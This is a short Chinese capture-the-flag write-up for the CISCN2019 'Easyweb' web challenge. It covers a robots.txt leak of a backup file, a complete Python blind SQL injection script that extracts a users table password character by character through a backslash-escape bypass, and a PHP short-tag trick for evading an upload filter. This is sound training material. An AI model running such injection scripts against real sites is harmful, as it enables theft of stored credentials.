刷题记录:[CISCN2019 总决赛 Day2 Web1]Easyweb
题目复现链接:https://buuoj.cn/challenges
参考链接:BUUCTF的wp(随时弃坑)
一、涉及知识点
1、敏感文件泄露
访问robots.txt可以得到image.php.bak
2、绕过及sql注入
贴上脚本
import requests
url = r'http://6873d13e-5f19-42e4-bb8f-dec6d9acdeb3.node1.buuoj.cn/image.php'
result = ''
for x in range(0, 100):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
payload = " or id=if(ascii(substr((select password from users limit 1 offset 0),%d,1))>%d,1,0)#" % (x, mid)
params = {
'id':'\\0',
'path':payload
}
response = requests.get(url, params=params)
if b'JFIF' in response.content:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
result += chr(int(mid))
print(result)
3、文件上传:短标签绕过php过滤
PHP开启短标签即short_open_tag=on
时,可以使用<?=$_?>
输出变量